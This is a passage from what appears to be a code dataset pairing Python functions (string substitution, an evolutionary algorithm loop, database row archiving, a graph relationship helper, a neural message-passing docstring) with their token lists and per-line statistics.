    # Loop through the entire string.
    for tmp in s:
        if backslash:
            out += tmp
            backslash = False
            continue
        # If a dollar is found, we might have a name or expression.
        # Alphabetics and underscore are always part of name.
        if dollar and nparen == 0:
            if tmp == '_' or ('a' <= tmp <= 'z') or ('A' <= tmp <= 'Z'):
                name += tmp
                continue
            # Numerics are only part if not first character.
            if '0' <= tmp <= '9' and name != '':
                name += tmp
                continue
            # $( indicates the start of an expression to evaluate.
            if tmp == '(' and name == '':
                nparen = 1
                evalstr = ''
                continue
            # End of name found. Try to substitute.
            out += substitutename(name, objlist, globals, locals)
            dollar = False
        # Handle possible single or double quotes.
        if tmp == '"' and not squote:
            dquote = not dquote
        elif tmp == "'" and not dquote:
            squote = not squote
        if not dquote and not squote:
            # Count the number of balanced parentheses
            # (outside quoted strings) in the subexpression.
            if nparen > 0:
                if tmp == '(':
                    nparen += 1
                elif tmp == ')':
                    nparen -= 1
                    if nparen == 0:
                        # The last closing parenthesis is found.
                        # Evaluate the subexpression.
                        # Add the result to the output.
                        out += substituteexpr(evalstr, globals, locals)
                        dollar = False
                evalstr += tmp
                continue
            # Set a switch if we have a dollar (outside quoted
            # and eval strings).
            if tmp == '$':
                dollar = True
                name = ''
                continue
        # No special character; add it to output or evalstr.
        # Set a switch if we have a backslash.
        if nparen == 0:
            out += tmp
        else:
            evalstr += tmp
        if tmp == '\\':
            backslash = True
    # The entire string has been handled.
    # Substitute a possible last name.
    # Insert a possible incomplete eval string as such.
    if dollar:
        out += substitutename(name, objlist, globals, locals)
    else:
        if nparen > 0:
            out += '$(' + evalstr
    return out | [
"def",
"substitute",
"(",
"s",
",",
"objlist",
"=",
"(",
")",
",",
"globals",
"=",
"{",
"}",
",",
"locals",
"=",
"{",
"}",
")",
":",
"# Get the local variables at the caller level if not given.",
"if",
"not",
"locals",
":",
"locals",
"=",
"getlocals",
"(",
"3",
")",
"# Initialize some variables.",
"backslash",
"=",
"False",
"dollar",
"=",
"False",
"nparen",
"=",
"0",
"name",
"=",
"''",
"evalstr",
"=",
"''",
"squote",
"=",
"False",
"dquote",
"=",
"False",
"out",
"=",
"''",
"# Loop through the entire string.",
"for",
"tmp",
"in",
"s",
":",
"if",
"backslash",
":",
"out",
"+=",
"tmp",
"backslash",
"=",
"False",
"continue",
"# If a dollar is found, we might have a name or expression.",
"# Alphabetics and underscore are always part of name.",
"if",
"dollar",
"and",
"nparen",
"==",
"0",
":",
"if",
"tmp",
"==",
"'_'",
"or",
"(",
"'a'",
"<=",
"tmp",
"<=",
"'z'",
")",
"or",
"(",
"'A'",
"<=",
"tmp",
"<=",
"'Z'",
")",
":",
"name",
"+=",
"tmp",
"continue",
"# Numerics are only part if not first character.",
"if",
"'0'",
"<=",
"tmp",
"<=",
"'9'",
"and",
"name",
"!=",
"''",
":",
"name",
"+=",
"tmp",
"continue",
"# $( indicates the start of an expression to evaluate.",
"if",
"tmp",
"==",
"'('",
"and",
"name",
"==",
"''",
":",
"nparen",
"=",
"1",
"evalstr",
"=",
"''",
"continue",
"# End of name found. Try to substitute.",
"out",
"+=",
"substitutename",
"(",
"name",
",",
"objlist",
",",
"globals",
",",
"locals",
")",
"dollar",
"=",
"False",
"# Handle possible single or double quotes.",
"if",
"tmp",
"==",
"'\"'",
"and",
"not",
"squote",
":",
"dquote",
"=",
"not",
"dquote",
"elif",
"tmp",
"==",
"\"'\"",
"and",
"not",
"dquote",
":",
"squote",
"=",
"not",
"squote",
"if",
"not",
"dquote",
"and",
"not",
"squote",
":",
"# Count the number of balanced parentheses",
"# (outside quoted strings) in the subexpression.",
"if",
"nparen",
">",
"0",
":",
"if",
"tmp",
"==",
"'('",
":",
"nparen",
"+=",
"1",
"elif",
"tmp",
"==",
"')'",
":",
"nparen",
"-=",
"1",
"if",
"nparen",
"==",
"0",
":",
"# The last closing parenthese is found.",
"# Evaluate the subexpression.",
"# Add the result to the output.",
"out",
"+=",
"substituteexpr",
"(",
"evalstr",
",",
"globals",
",",
"locals",
")",
"dollar",
"=",
"False",
"evalstr",
"+=",
"tmp",
"continue",
"# Set a switch if we have a dollar (outside quoted",
"# and eval strings).",
"if",
"tmp",
"==",
"'$'",
":",
"dollar",
"=",
"True",
"name",
"=",
"''",
"continue",
"# No special character; add it to output or evalstr.",
"# Set a switch if we have a backslash.",
"if",
"nparen",
"==",
"0",
":",
"out",
"+=",
"tmp",
"else",
":",
"evalstr",
"+=",
"tmp",
"if",
"tmp",
"==",
"'\\\\'",
":",
"backslash",
"=",
"True",
"# The entire string has been handled.",
"# Substitute a possible last name.",
"# Insert a possible incomplete eval string as such.",
"if",
"dollar",
":",
"out",
"+=",
"substitutename",
"(",
"name",
",",
"objlist",
",",
"globals",
",",
"locals",
")",
"else",
":",
"if",
"nparen",
">",
"0",
":",
"out",
"+=",
"'$('",
"+",
"evalstr",
"return",
"out"
] | 36.772414 | [
0.018867924528301886,
0.03225806451612903,
0,
0.029411764705882353,
0.1267605633802817,
0.030303030303030304,
0.05084745762711865,
0.06666666666666667,
0,
0.029850746268656716,
0.05660377358490566,
0.027777777777777776,
0.11538461538461539,
0.043478260869565216,
0.04225352112676056,
0.05660377358490566,
0.05555555555555555,
0.027777777777777776,
0.043478260869565216,
0.05084745762711865,
0.03125,
0.041666666666666664,
0.04054054054054054,
0.056338028169014086,
0.06349206349206349,
0.02666666666666667,
0,
0.041666666666666664,
0.06896551724137931,
0,
0.07142857142857142,
0.039473684210526314,
0.04054054054054054,
0.3076923076923077,
0.02702702702702703,
0.047619047619047616,
0,
0.04054054054054054,
0.06896551724137931,
0.030303030303030304,
0.17647058823529413,
0,
0.17647058823529413,
0.17647058823529413,
0.08571428571428572,
0.15384615384615385,
0,
0.08823529411764706,
0.18181818181818182,
0,
0.08108108108108109,
0.09523809523809523,
0,
0.075,
0.16666666666666666,
0,
0.06666666666666667,
0.18181818181818182,
0,
0.06896551724137931,
0.03773584905660377,
0,
0.2857142857142857,
0.031746031746031744,
0.1111111111111111,
0.06896551724137931,
0.0625,
0.09523809523809523,
0.1111111111111111,
0.14285714285714285,
0.15384615384615385,
0.125,
0.1111111111111111,
0.1111111111111111,
0.16666666666666666,
0.05405405405405406,
0.11764705882352941,
0.09523809523809523,
0.09090909090909091,
0.06896551724137931,
0.1,
0.029850746268656716,
0.03278688524590164,
0.058823529411764705,
0.027777777777777776,
0.07407407407407407,
0.08333333333333333,
0.03333333333333333,
0.041666666666666664,
0.07407407407407407,
0.08333333333333333,
0.030303030303030304,
0.04878048780487805,
0.07692307692307693,
0.07142857142857142,
0.08333333333333333,
0.0392156862745098,
0.03076923076923077,
0.07692307692307693,
0,
0.04,
0.05405405405405406,
0.06451612903225806,
0.05128205128205128,
0.06451612903225806,
0.05405405405405406,
0.037037037037037035,
0.03333333333333333,
0.07692307692307693,
0.06666666666666667,
0.06451612903225806,
0.0625,
0.06451612903225806,
0.05714285714285714,
0.031746031746031744,
0.03773584905660377,
0.03636363636363636,
0.028169014084507043,
0.05263157894736842,
0.06666666666666667,
0.08333333333333333,
0.03225806451612903,
0.0625,
0.07692307692307693,
0.06896551724137931,
0.08,
0.08333333333333333,
0.03333333333333333,
0.043478260869565216,
0.08695652173913043,
0.09090909090909091,
0.15384615384615385,
0.07692307692307693,
0.08695652173913043,
0.07142857142857142,
0,
0.044444444444444446,
0.047619047619047616,
0.03389830508474576,
0.14285714285714285,
0.03278688524590164,
0.2222222222222222,
0.09090909090909091,
0.06060606060606061,
0.14285714285714285
] |
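A minimal usage sketch for the `substitute` record above. It assumes the companion helpers `substitutename`, `substituteexpr`, and `getlocals` are importable from the same module and that they render their results as strings; every name here is illustrative.

# $name is resolved through substitutename(); $(expr) through substituteexpr().
radius = 2.0
print(substitute("r = $radius"))                    # -> "r = 2.0"
print(substitute("area = $(3.14159 * radius**2)"))  # -> "area = 12.56636"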
def evolve(self, generator, evaluator, pop_size=100, seeds=None, maximize=True, bounder=None, **args):
"""Perform the evolution.
This function creates a population and then runs it through a series
of evolutionary epochs until the terminator is satisfied. The general
outline of an epoch is selection, variation, evaluation, replacement,
migration, archival, and observation. The function returns a list of
elements of type ``Individual`` representing the individuals contained
in the final population.
Arguments:
- *generator* -- the function to be used to generate candidate solutions
- *evaluator* -- the function to be used to evaluate candidate solutions
- *pop_size* -- the number of Individuals in the population (default 100)
- *seeds* -- an iterable collection of candidate solutions to include
in the initial population (default None)
- *maximize* -- Boolean value stating use of maximization (default True)
- *bounder* -- a function used to bound candidate solutions (default None)
- *args* -- a dictionary of keyword arguments
The *bounder* parameter, if left as ``None``, will be initialized to a
default ``Bounder`` object that performs no bounding on candidates.
Note that the *_kwargs* class variable will be initialized to the *args*
parameter here. It will also be modified to include the following 'built-in'
keyword argument:
- *_ec* -- the evolutionary computation (this object)
"""
self._kwargs = args
self._kwargs['_ec'] = self
if seeds is None:
seeds = []
if bounder is None:
bounder = Bounder()
self.termination_cause = None
self.generator = generator
self.evaluator = evaluator
self.bounder = bounder
self.maximize = maximize
self.population = []
self.archive = []
# Create the initial population.
if not isinstance(seeds, collections.Sequence):
seeds = [seeds]
initial_cs = copy.copy(seeds)
num_generated = max(pop_size - len(seeds), 0)
i = 0
self.logger.debug('generating initial population')
while i < num_generated:
cs = generator(random=self._random, args=self._kwargs)
initial_cs.append(cs)
i += 1
self.logger.debug('evaluating initial population')
initial_fit = evaluator(candidates=initial_cs, args=self._kwargs)
for cs, fit in zip(initial_cs, initial_fit):
if fit is not None:
ind = Individual(cs, maximize=maximize)
ind.fitness = fit
self.population.append(ind)
else:
self.logger.warning('excluding candidate {0} because fitness received as None'.format(cs))
self.logger.debug('population size is now {0}'.format(len(self.population)))
self.num_evaluations = len(initial_fit)
self.num_generations = 0
self.logger.debug('archiving initial population')
self.archive = self.archiver(random=self._random, population=list(self.population), archive=list(self.archive), args=self._kwargs)
self.logger.debug('archive size is now {0}'.format(len(self.archive)))
self.logger.debug('population size is now {0}'.format(len(self.population)))
# Turn observers and variators into lists if not already
if isinstance(self.observer, collections.Iterable):
observers = self.observer
else:
observers = [self.observer]
if isinstance(self.variator, collections.Iterable):
variators = self.variator
else:
variators = [self.variator]
for obs in observers:
self.logger.debug('observation using {0} at generation {1} and evaluation {2}'.format(obs.__name__, self.num_generations, self.num_evaluations))
obs(population=list(self.population), num_generations=self.num_generations, num_evaluations=self.num_evaluations, args=self._kwargs)
while not self._should_terminate(list(self.population), self.num_generations, self.num_evaluations):
# Select individuals.
self.logger.debug('selection using {0} at generation {1} and evaluation {2}'.format(self.selector.__name__, self.num_generations, self.num_evaluations))
parents = self.selector(random=self._random, population=list(self.population), args=self._kwargs)
self.logger.debug('selected {0} candidates'.format(len(parents)))
offspring_cs = [copy.deepcopy(i.candidate) for i in parents]
for op in variators:
self.logger.debug('variation using {0} at generation {1} and evaluation {2}'.format(op.__name__, self.num_generations, self.num_evaluations))
offspring_cs = op(random=self._random, candidates=offspring_cs, args=self._kwargs)
self.logger.debug('created {0} offspring'.format(len(offspring_cs)))
# Evaluate offspring.
self.logger.debug('evaluation using {0} at generation {1} and evaluation {2}'.format(evaluator.__name__, self.num_generations, self.num_evaluations))
offspring_fit = evaluator(candidates=offspring_cs, args=self._kwargs)
offspring = []
for cs, fit in zip(offspring_cs, offspring_fit):
if fit is not None:
off = Individual(cs, maximize=maximize)
off.fitness = fit
offspring.append(off)
else:
self.logger.warning('excluding candidate {0} because fitness received as None'.format(cs))
self.num_evaluations += len(offspring_fit)
# Replace individuals.
self.logger.debug('replacement using {0} at generation {1} and evaluation {2}'.format(self.replacer.__name__, self.num_generations, self.num_evaluations))
self.population = self.replacer(random=self._random, population=self.population, parents=parents, offspring=offspring, args=self._kwargs)
self.logger.debug('population size is now {0}'.format(len(self.population)))
# Migrate individuals.
self.logger.debug('migration using {0} at generation {1} and evaluation {2}'.format(self.migrator.__name__, self.num_generations, self.num_evaluations))
self.population = self.migrator(random=self._random, population=self.population, args=self._kwargs)
self.logger.debug('population size is now {0}'.format(len(self.population)))
# Archive individuals.
self.logger.debug('archival using {0} at generation {1} and evaluation {2}'.format(self.archiver.__name__, self.num_generations, self.num_evaluations))
self.archive = self.archiver(random=self._random, archive=self.archive, population=list(self.population), args=self._kwargs)
self.logger.debug('archive size is now {0}'.format(len(self.archive)))
self.logger.debug('population size is now {0}'.format(len(self.population)))
self.num_generations += 1
for obs in observers:
self.logger.debug('observation using {0} at generation {1} and evaluation {2}'.format(obs.__name__, self.num_generations, self.num_evaluations))
obs(population=list(self.population), num_generations=self.num_generations, num_evaluations=self.num_evaluations, args=self._kwargs)
return self.population | [
"def",
"evolve",
"(",
"self",
",",
"generator",
",",
"evaluator",
",",
"pop_size",
"=",
"100",
",",
"seeds",
"=",
"None",
",",
"maximize",
"=",
"True",
",",
"bounder",
"=",
"None",
",",
"*",
"*",
"args",
")",
":",
"self",
".",
"_kwargs",
"=",
"args",
"self",
".",
"_kwargs",
"[",
"'_ec'",
"]",
"=",
"self",
"if",
"seeds",
"is",
"None",
":",
"seeds",
"=",
"[",
"]",
"if",
"bounder",
"is",
"None",
":",
"bounder",
"=",
"Bounder",
"(",
")",
"self",
".",
"termination_cause",
"=",
"None",
"self",
".",
"generator",
"=",
"generator",
"self",
".",
"evaluator",
"=",
"evaluator",
"self",
".",
"bounder",
"=",
"bounder",
"self",
".",
"maximize",
"=",
"maximize",
"self",
".",
"population",
"=",
"[",
"]",
"self",
".",
"archive",
"=",
"[",
"]",
"# Create the initial population.",
"if",
"not",
"isinstance",
"(",
"seeds",
",",
"collections",
".",
"Sequence",
")",
":",
"seeds",
"=",
"[",
"seeds",
"]",
"initial_cs",
"=",
"copy",
".",
"copy",
"(",
"seeds",
")",
"num_generated",
"=",
"max",
"(",
"pop_size",
"-",
"len",
"(",
"seeds",
")",
",",
"0",
")",
"i",
"=",
"0",
"self",
".",
"logger",
".",
"debug",
"(",
"'generating initial population'",
")",
"while",
"i",
"<",
"num_generated",
":",
"cs",
"=",
"generator",
"(",
"random",
"=",
"self",
".",
"_random",
",",
"args",
"=",
"self",
".",
"_kwargs",
")",
"initial_cs",
".",
"append",
"(",
"cs",
")",
"i",
"+=",
"1",
"self",
".",
"logger",
".",
"debug",
"(",
"'evaluating initial population'",
")",
"initial_fit",
"=",
"evaluator",
"(",
"candidates",
"=",
"initial_cs",
",",
"args",
"=",
"self",
".",
"_kwargs",
")",
"for",
"cs",
",",
"fit",
"in",
"zip",
"(",
"initial_cs",
",",
"initial_fit",
")",
":",
"if",
"fit",
"is",
"not",
"None",
":",
"ind",
"=",
"Individual",
"(",
"cs",
",",
"maximize",
"=",
"maximize",
")",
"ind",
".",
"fitness",
"=",
"fit",
"self",
".",
"population",
".",
"append",
"(",
"ind",
")",
"else",
":",
"self",
".",
"logger",
".",
"warning",
"(",
"'excluding candidate {0} because fitness received as None'",
".",
"format",
"(",
"cs",
")",
")",
"self",
".",
"logger",
".",
"debug",
"(",
"'population size is now {0}'",
".",
"format",
"(",
"len",
"(",
"self",
".",
"population",
")",
")",
")",
"self",
".",
"num_evaluations",
"=",
"len",
"(",
"initial_fit",
")",
"self",
".",
"num_generations",
"=",
"0",
"self",
".",
"logger",
".",
"debug",
"(",
"'archiving initial population'",
")",
"self",
".",
"archive",
"=",
"self",
".",
"archiver",
"(",
"random",
"=",
"self",
".",
"_random",
",",
"population",
"=",
"list",
"(",
"self",
".",
"population",
")",
",",
"archive",
"=",
"list",
"(",
"self",
".",
"archive",
")",
",",
"args",
"=",
"self",
".",
"_kwargs",
")",
"self",
".",
"logger",
".",
"debug",
"(",
"'archive size is now {0}'",
".",
"format",
"(",
"len",
"(",
"self",
".",
"archive",
")",
")",
")",
"self",
".",
"logger",
".",
"debug",
"(",
"'population size is now {0}'",
".",
"format",
"(",
"len",
"(",
"self",
".",
"population",
")",
")",
")",
"# Turn observers and variators into lists if not already",
"if",
"isinstance",
"(",
"self",
".",
"observer",
",",
"collections",
".",
"Iterable",
")",
":",
"observers",
"=",
"self",
".",
"observer",
"else",
":",
"observers",
"=",
"[",
"self",
".",
"observer",
"]",
"if",
"isinstance",
"(",
"self",
".",
"variator",
",",
"collections",
".",
"Iterable",
")",
":",
"variators",
"=",
"self",
".",
"variator",
"else",
":",
"variators",
"=",
"[",
"self",
".",
"variator",
"]",
"for",
"obs",
"in",
"observers",
":",
"self",
".",
"logger",
".",
"debug",
"(",
"'observation using {0} at generation {1} and evaluation {2}'",
".",
"format",
"(",
"obs",
".",
"__name__",
",",
"self",
".",
"num_generations",
",",
"self",
".",
"num_evaluations",
")",
")",
"obs",
"(",
"population",
"=",
"list",
"(",
"self",
".",
"population",
")",
",",
"num_generations",
"=",
"self",
".",
"num_generations",
",",
"num_evaluations",
"=",
"self",
".",
"num_evaluations",
",",
"args",
"=",
"self",
".",
"_kwargs",
")",
"while",
"not",
"self",
".",
"_should_terminate",
"(",
"list",
"(",
"self",
".",
"population",
")",
",",
"self",
".",
"num_generations",
",",
"self",
".",
"num_evaluations",
")",
":",
"# Select individuals.",
"self",
".",
"logger",
".",
"debug",
"(",
"'selection using {0} at generation {1} and evaluation {2}'",
".",
"format",
"(",
"self",
".",
"selector",
".",
"__name__",
",",
"self",
".",
"num_generations",
",",
"self",
".",
"num_evaluations",
")",
")",
"parents",
"=",
"self",
".",
"selector",
"(",
"random",
"=",
"self",
".",
"_random",
",",
"population",
"=",
"list",
"(",
"self",
".",
"population",
")",
",",
"args",
"=",
"self",
".",
"_kwargs",
")",
"self",
".",
"logger",
".",
"debug",
"(",
"'selected {0} candidates'",
".",
"format",
"(",
"len",
"(",
"parents",
")",
")",
")",
"offspring_cs",
"=",
"[",
"copy",
".",
"deepcopy",
"(",
"i",
".",
"candidate",
")",
"for",
"i",
"in",
"parents",
"]",
"for",
"op",
"in",
"variators",
":",
"self",
".",
"logger",
".",
"debug",
"(",
"'variation using {0} at generation {1} and evaluation {2}'",
".",
"format",
"(",
"op",
".",
"__name__",
",",
"self",
".",
"num_generations",
",",
"self",
".",
"num_evaluations",
")",
")",
"offspring_cs",
"=",
"op",
"(",
"random",
"=",
"self",
".",
"_random",
",",
"candidates",
"=",
"offspring_cs",
",",
"args",
"=",
"self",
".",
"_kwargs",
")",
"self",
".",
"logger",
".",
"debug",
"(",
"'created {0} offspring'",
".",
"format",
"(",
"len",
"(",
"offspring_cs",
")",
")",
")",
"# Evaluate offspring.",
"self",
".",
"logger",
".",
"debug",
"(",
"'evaluation using {0} at generation {1} and evaluation {2}'",
".",
"format",
"(",
"evaluator",
".",
"__name__",
",",
"self",
".",
"num_generations",
",",
"self",
".",
"num_evaluations",
")",
")",
"offspring_fit",
"=",
"evaluator",
"(",
"candidates",
"=",
"offspring_cs",
",",
"args",
"=",
"self",
".",
"_kwargs",
")",
"offspring",
"=",
"[",
"]",
"for",
"cs",
",",
"fit",
"in",
"zip",
"(",
"offspring_cs",
",",
"offspring_fit",
")",
":",
"if",
"fit",
"is",
"not",
"None",
":",
"off",
"=",
"Individual",
"(",
"cs",
",",
"maximize",
"=",
"maximize",
")",
"off",
".",
"fitness",
"=",
"fit",
"offspring",
".",
"append",
"(",
"off",
")",
"else",
":",
"self",
".",
"logger",
".",
"warning",
"(",
"'excluding candidate {0} because fitness received as None'",
".",
"format",
"(",
"cs",
")",
")",
"self",
".",
"num_evaluations",
"+=",
"len",
"(",
"offspring_fit",
")",
"# Replace individuals.",
"self",
".",
"logger",
".",
"debug",
"(",
"'replacement using {0} at generation {1} and evaluation {2}'",
".",
"format",
"(",
"self",
".",
"replacer",
".",
"__name__",
",",
"self",
".",
"num_generations",
",",
"self",
".",
"num_evaluations",
")",
")",
"self",
".",
"population",
"=",
"self",
".",
"replacer",
"(",
"random",
"=",
"self",
".",
"_random",
",",
"population",
"=",
"self",
".",
"population",
",",
"parents",
"=",
"parents",
",",
"offspring",
"=",
"offspring",
",",
"args",
"=",
"self",
".",
"_kwargs",
")",
"self",
".",
"logger",
".",
"debug",
"(",
"'population size is now {0}'",
".",
"format",
"(",
"len",
"(",
"self",
".",
"population",
")",
")",
")",
"# Migrate individuals.",
"self",
".",
"logger",
".",
"debug",
"(",
"'migration using {0} at generation {1} and evaluation {2}'",
".",
"format",
"(",
"self",
".",
"migrator",
".",
"__name__",
",",
"self",
".",
"num_generations",
",",
"self",
".",
"num_evaluations",
")",
")",
"self",
".",
"population",
"=",
"self",
".",
"migrator",
"(",
"random",
"=",
"self",
".",
"_random",
",",
"population",
"=",
"self",
".",
"population",
",",
"args",
"=",
"self",
".",
"_kwargs",
")",
"self",
".",
"logger",
".",
"debug",
"(",
"'population size is now {0}'",
".",
"format",
"(",
"len",
"(",
"self",
".",
"population",
")",
")",
")",
"# Archive individuals.",
"self",
".",
"logger",
".",
"debug",
"(",
"'archival using {0} at generation {1} and evaluation {2}'",
".",
"format",
"(",
"self",
".",
"archiver",
".",
"__name__",
",",
"self",
".",
"num_generations",
",",
"self",
".",
"num_evaluations",
")",
")",
"self",
".",
"archive",
"=",
"self",
".",
"archiver",
"(",
"random",
"=",
"self",
".",
"_random",
",",
"archive",
"=",
"self",
".",
"archive",
",",
"population",
"=",
"list",
"(",
"self",
".",
"population",
")",
",",
"args",
"=",
"self",
".",
"_kwargs",
")",
"self",
".",
"logger",
".",
"debug",
"(",
"'archive size is now {0}'",
".",
"format",
"(",
"len",
"(",
"self",
".",
"archive",
")",
")",
")",
"self",
".",
"logger",
".",
"debug",
"(",
"'population size is now {0}'",
".",
"format",
"(",
"len",
"(",
"self",
".",
"population",
")",
")",
")",
"self",
".",
"num_generations",
"+=",
"1",
"for",
"obs",
"in",
"observers",
":",
"self",
".",
"logger",
".",
"debug",
"(",
"'observation using {0} at generation {1} and evaluation {2}'",
".",
"format",
"(",
"obs",
".",
"__name__",
",",
"self",
".",
"num_generations",
",",
"self",
".",
"num_evaluations",
")",
")",
"obs",
"(",
"population",
"=",
"list",
"(",
"self",
".",
"population",
")",
",",
"num_generations",
"=",
"self",
".",
"num_generations",
",",
"num_evaluations",
"=",
"self",
".",
"num_evaluations",
",",
"args",
"=",
"self",
".",
"_kwargs",
")",
"return",
"self",
".",
"population"
] | 55.224638 | [
0.0196078431372549,
0.06060606060606061,
0.25,
0.02631578947368421,
0.025974025974025976,
0.025974025974025976,
0.02631578947368421,
0.038461538461538464,
0.0625,
0.25,
0.1111111111111111,
0.25,
0.06172839506172839,
0.05,
0.06172839506172839,
0.03896103896103896,
0.08,
0.0625,
0.06097560975609756,
0.05660377358490566,
0,
0.0641025641025641,
0.04,
0.08641975308641975,
0.047058823529411764,
0.08,
0.25,
0.06557377049180328,
0.25,
0.18181818181818182,
0.07407407407407407,
0.058823529411764705,
0.25,
0.08,
0.09090909090909091,
0.07407407407407407,
0.06451612903225806,
0.25,
0.05405405405405406,
0.058823529411764705,
0.058823529411764705,
0.06666666666666667,
0.0625,
0.07142857142857142,
0.08,
0.25,
0.05,
0.03636363636363636,
0.07407407407407407,
0.05405405405405406,
0.03773584905660377,
0.15384615384615385,
0.034482758620689655,
0.0625,
0.030303030303030304,
0.06060606060606061,
0.1111111111111111,
0.034482758620689655,
0.0273972602739726,
0.25,
0.038461538461538464,
0.06451612903225806,
0.03636363636363636,
0.06060606060606061,
0.046511627906976744,
0.11764705882352941,
0.02830188679245283,
0.03571428571428571,
0.25,
0.0425531914893617,
0.0625,
0.25,
0.03508771929824561,
0.021739130434782608,
0.02564102564102564,
0.03571428571428571,
0,
0.03125,
0.03389830508474576,
0.05405405405405406,
0.15384615384615385,
0.05128205128205128,
0.03389830508474576,
0.05405405405405406,
0.15384615384615385,
0.05128205128205128,
0,
0.06896551724137931,
0.019230769230769232,
0.020833333333333332,
0.25,
0.027777777777777776,
0.06060606060606061,
0.018292682926829267,
0.027522935779816515,
0.025974025974025976,
0.027777777777777776,
0.16666666666666666,
0.0625,
0.01910828025477707,
0.030612244897959183,
0.0375,
0.16666666666666666,
0.06060606060606061,
0.018633540372670808,
0.037037037037037035,
0.07692307692307693,
0.03333333333333333,
0.05714285714285714,
0.03389830508474576,
0.05405405405405406,
0.04878048780487805,
0.09523809523809523,
0.02727272727272727,
0.04838709677419355,
0,
0.058823529411764705,
0.018072289156626505,
0.020134228187919462,
0.03409090909090909,
0.16666666666666666,
0.058823529411764705,
0.018292682926829267,
0.02702702702702703,
0.03409090909090909,
0.16666666666666666,
0.058823529411764705,
0.018404907975460124,
0.022058823529411766,
0.036585365853658534,
0.03409090909090909,
0.16666666666666666,
0.05405405405405406,
0.06060606060606061,
0.01875,
0.02027027027027027,
0,
0.06666666666666667
] |
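A hedged usage sketch for the `evolve` record above, written against an inspyred-style evolutionary computation. `ec` stands in for an instance whose selector, variator, replacer, migrator, archiver, and observer are already configured, and `max_generations` assumes a generation-count terminator; none of those names come from the record itself.

def my_generator(random, args):
    # Two-dimensional candidate drawn uniformly from [-5, 5]^2.
    return [random.uniform(-5.0, 5.0) for _ in range(2)]

def my_evaluator(candidates, args):
    # Negative sphere function: fitness peaks at 0 at the origin.
    return [-(x * x + y * y) for x, y in candidates]

final_pop = ec.evolve(generator=my_generator,
                      evaluator=my_evaluator,
                      pop_size=50,
                      maximize=True,
                      max_generations=20)  # forwarded to the terminator via **args
best = max(final_pop, key=lambda ind: ind.fitness)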
def to_archivable_dict(self, dialect, use_dirty=True):
"""
:param dialect: a :py:class:`~sqlalchemy.engine.interfaces.Dialect` corresponding to the \
SQL dialect being used.
:param use_dirty: whether to make a dict of the fields as they stand, or the fields \
before the row was updated
:return: a dictionary of key value pairs representing this row.
:rtype: dict
"""
return {
cn: utils.get_column_attribute(self, c, use_dirty=use_dirty, dialect=dialect)
for c, cn in utils.get_column_keys_and_names(self)
if c not in self.ignore_columns
} | [
"def",
"to_archivable_dict",
"(",
"self",
",",
"dialect",
",",
"use_dirty",
"=",
"True",
")",
":",
"return",
"{",
"cn",
":",
"utils",
".",
"get_column_attribute",
"(",
"self",
",",
"c",
",",
"use_dirty",
"=",
"use_dirty",
",",
"dialect",
"=",
"dialect",
")",
"for",
"c",
",",
"cn",
"in",
"utils",
".",
"get_column_keys_and_names",
"(",
"self",
")",
"if",
"c",
"not",
"in",
"self",
".",
"ignore_columns",
"}"
] | 43.333333 | [
0.018518518518518517,
0.18181818181818182,
0.09183673469387756,
0.05714285714285714,
0.043010752688172046,
0.05263157894736842,
0,
0.04225352112676056,
0.15,
0.18181818181818182,
0.1875,
0.033707865168539325,
0.03225806451612903,
0.046511627906976744,
0.3333333333333333
] |
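An illustrative call for the `to_archivable_dict` record above; `row` (an instance of a model using this mixin) and `engine` (a SQLAlchemy engine) are hypothetical names.

# Snapshot the pre-update values, skipping anything listed in ignore_columns.
archived = row.to_archivable_dict(engine.dialect, use_dirty=False)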
def add_rel(self, source_node_id, target_node_id, rel):
"""Add a relationship between nodes.
Args:
source_node_id: Node Id for the source node.
target_node_id: Node Id for the target node.
            rel: Name of the relationship, e.g. 'contains'.
"""
# Add the relationship
n1_ref = self.graph_db.get_indexed_node('Node', 'node_id', source_node_id)
n2_ref = self.graph_db.get_indexed_node('Node', 'node_id', target_node_id)
# Sanity check
if not n1_ref or not n2_ref:
            print('Cannot add relationship between unfound nodes: %s --> %s' % (source_node_id, target_node_id))
return
path = neo4j.Path(n1_ref, rel, n2_ref)
path.get_or_create(self.graph_db) | [
"def",
"add_rel",
"(",
"self",
",",
"source_node_id",
",",
"target_node_id",
",",
"rel",
")",
":",
"# Add the relationship",
"n1_ref",
"=",
"self",
".",
"graph_db",
".",
"get_indexed_node",
"(",
"'Node'",
",",
"'node_id'",
",",
"source_node_id",
")",
"n2_ref",
"=",
"self",
".",
"graph_db",
".",
"get_indexed_node",
"(",
"'Node'",
",",
"'node_id'",
",",
"target_node_id",
")",
"# Sanity check",
"if",
"not",
"n1_ref",
"or",
"not",
"n2_ref",
":",
"print",
"'Cannot add relationship between unfound nodes: %s --> %s'",
"%",
"(",
"source_node_id",
",",
"target_node_id",
")",
"return",
"path",
"=",
"neo4j",
".",
"Path",
"(",
"n1_ref",
",",
"rel",
",",
"n2_ref",
")",
"path",
".",
"get_or_create",
"(",
"self",
".",
"graph_db",
")"
] | 39.736842 | [
0.01818181818181818,
0.045454545454545456,
0,
0.15384615384615385,
0.03571428571428571,
0.03571428571428571,
0.038461538461538464,
0.18181818181818182,
0,
0.06666666666666667,
0.036585365853658534,
0.036585365853658534,
0,
0.09090909090909091,
0.05555555555555555,
0.02702702702702703,
0.1111111111111111,
0.043478260869565216,
0.04878048780487805
] |
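A sketch of calling the `add_rel` record above; `graph` stands for an instance of the owning class, and the node ids are invented.

# Both endpoints must already be indexed under 'Node'/'node_id'; otherwise the
# method prints a warning and returns without creating the relationship.
graph.add_rel('host-1', 'process-42', 'contains')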
def compute_mpnn_qkv(node_states,
total_key_depth,
total_value_depth,
num_transforms):
"""Computes query, key and value for edge matrices.
Let B be the number of batches.
Let N be the number of nodes in the graph.
Let D be the size of the node hidden states.
Let K be the size of the attention keys/queries (total_key_depth).
Let V be the size of the attention values (total_value_depth).
Let T be the total number of transforms (num_transforms).
Computes the queries, keys, and values for attention.
* For each node N_i in the graph, a query Q_i of size K is computed. This
query is used to determine the relative weights to give to each of the
node's incoming edges.
* For each node N_j and edge type t, a key K_jt of size K is computed. When an
edge of type t goes from node N_j to any other node, K_jt is the key that is
    used in the attention process.
* For each node N_j and edge type t, a value V_jt of size V is computed. When
an edge of type t goes from node N_j to node N_i, Attention(Q_i, K_jt)
produces a weight w_ijt. The message sent along this edge is w_ijt * V_jt.
Args:
node_states: A Tensor with shape [B, N, D].
total_key_depth: an integer (K).
total_value_depth: an integer (V).
    num_transforms: an integer specifying the number of transforms (T). This is
typically the number of edge types.
Returns:
q: The attention queries for each destination node (shape [B, N, K]).
k: The attention keys for each node and edge type (shape [B, N*T, K]).
